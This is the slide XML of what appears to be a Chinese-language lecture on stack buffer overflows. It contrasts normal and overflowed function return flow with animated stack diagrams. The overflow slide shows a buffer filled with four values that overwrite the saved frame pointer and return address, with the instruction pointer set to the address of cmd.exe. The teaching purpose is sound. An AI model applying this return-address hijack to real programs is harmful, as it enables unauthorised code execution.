              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076056" y="448396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31" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7007920" y="3028890"/>
            <a:ext cx="1123038"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EBP(f)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076056" y="1988071"/>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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8316416" y="5045114"/>
            <a:ext cx="1110685"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ESP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8130958" y="3024108"/>
            <a:ext cx="329474"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000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs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416 -0.00255 L -0.00416 -0.07586 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>
                                    </p:animMotion>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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00416 -0.07586 L -0.00416 -0.1494 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00416 -0.1494 L -0.00416 -0.22271 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3677"/>
                                    </p:animMotion>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4" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="4" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.22291 L -0.00417 -0.29629 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>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2.77778E-6 -4.81481E-6 L -0.1724 -0.28587 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="82" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-8628" y="-14306"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="83" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="84" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" grpId="2" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="87" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="25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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="10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5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="5" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.29629 L -0.00417 -0.3699 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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additive="base">
                                        <p:cTn id="113" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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4" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="6" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.3699 L -0.00417 -0.44328 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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64" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="7" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.00417 -0.44328 L -0.00417 -0.51689 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3681"/>
                                    </p:animMotion>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8" grpId="0"/>
      <p:bldP spid="18" grpId="1"/>
      <p:bldP spid="18" grpId="2"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1" uiExpand="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="34" grpId="1"/>
      <p:bldP spid="34" grpId="2"/>
      <p:bldP spid="34" grpId="3"/>
      <p:bldP spid="34" grpId="4"/>
      <p:bldP spid="34" grpId="5"/>
      <p:bldP spid="34" grpId="6"/>
      <p:bldP spid="34" grpId="7"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId="1"/>
    </p:bld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14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>正常函数返回流程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buffer_a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2163558" y="2971751"/>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EBP(main)</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4097034" y="5045114"/>
            <a:ext cx="1308497"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EBP(m)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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EBP(f)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2165171" y="1988071"/>
            <a:ext cx="1798587"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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5405531" y="1556792"/>
            <a:ext cx="1110685"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ESP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4107774" y="3532946"/>
            <a:ext cx="1308497"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rPr>
              <a:t>IP = ret</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs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0208 0.00232 L 0.00208 0.07561 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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0.00208 0.07561 L 0.00208 0.1489 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertic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2" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.14891 L 0.00208 0.21203 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="2" presetClass="exit" presetSubtype="6" fill="hold" grpId="0" nodeType="after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1+ppt_w/2"/>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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="after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3" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.00208 0.21203 L 0.00208 0.27492 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3145"/>
                                    </p:animMotion>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grpId="0"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1+ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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2" grpId="0"/>
      <p:bldP spid="15" grpId="0"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>
      <p:bldP spid="17" grpId="1"/>
      <p:bldP spid="17" grpId="2"/>
      <p:bldP spid="17" grpId="3"/>
      <p:bldP spid="19" grpId="0"/>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fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出函数返回流程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6451203" y="3140968"/>
            <a:ext cx="2520280"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EBP(m)=k3???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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EBP(f)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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ESP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6444208" y="3579703"/>
            <a:ext cx="2304256" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP = k4???</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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buffer_b</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6451203" y="2212702"/>
            <a:ext cx="2520280" cy="861774"/>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buffer_a=k1k2k3k4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>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ki:4 byte</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4647094" y="4606096"/>
            <a:ext cx="2304256" cy="861774"/>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rPr>
              <a:t>k4=addr(cmd.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IP=addr(cmd.exe)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="321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052" y="1674733"/>
            <a:ext cx="64484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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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208 0.00232 L 0.00208 0.07561 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="3653"/>
